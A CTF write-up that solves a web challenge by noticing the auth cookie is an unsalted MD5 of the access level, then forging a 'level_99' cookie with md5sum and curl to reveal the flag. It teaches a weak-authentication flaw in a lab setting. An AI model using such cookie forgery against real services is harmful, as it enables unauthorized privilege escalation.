131 words
1 minute
SCSC2026 Quals - SCSC Secure Vault - Web Exploitation Writeup
Category: Web Exploitation
URL: http://sriwijayasecuritysociety.com:8003/
Flag: SCSC26{kUE_r4h4s14_bU4t_4ks3s_L3v3L_d3w4}
Challenge Description
A document storage system using hash-based authentication. Users are given a scsc_auth cookie that determines their access level. Default access is “level_1”, but the secret document requires “level_99”.
Initial Reconnaissance
$ curl -v http://sriwijayasecuritysociety.com:8003/ 2>&1 | grep -i cookie< Set-Cookie: scsc_auth=c98a679441798bdb9c194f9ca471e6cdThe cookie looks like an MD5 hash (32 hex characters).
Analysis
Let’s verify if it’s MD5 of the access level:
$ echo -n "level_1" | md5sumc98a679441798bdb9c194f9ca471e6cd -Confirmed! The cookie is simply MD5("level_1").
Vulnerability
The authentication mechanism has critical flaws:
-
No server-side session management
-
No secret key or salt in the hash
-
No signature verification (HMAC)
-
The “secret” is just an unsalted MD5 hash that anyone can compute
Exploitation
Generate the MD5 hash for level_99:
$ echo -n "level_99" | md5sum9a22a3d174f06065a7dc2769f16fc738 -Access the vault with forged token:
$ curl -s -b "scsc_auth=9a22a3d174f06065a7dc2769f16fc738" \ http://sriwijayasecuritysociety.com:8003/index.phpResponse
<div class="file-item"> <span>Top_Secret_Flag.txt</span> <span class="unlocked">SCSC26{kUE_r4h4s14_bU4t_4ks3s_L3v3L_d3w4}</span></div> SCSC2026 Quals - SCSC Secure Vault - Web Exploitation Writeup
https://fuwari.vercel.app/posts/20/scsc2026-quals-scsc-secure-vault-web-exploitation-writeup/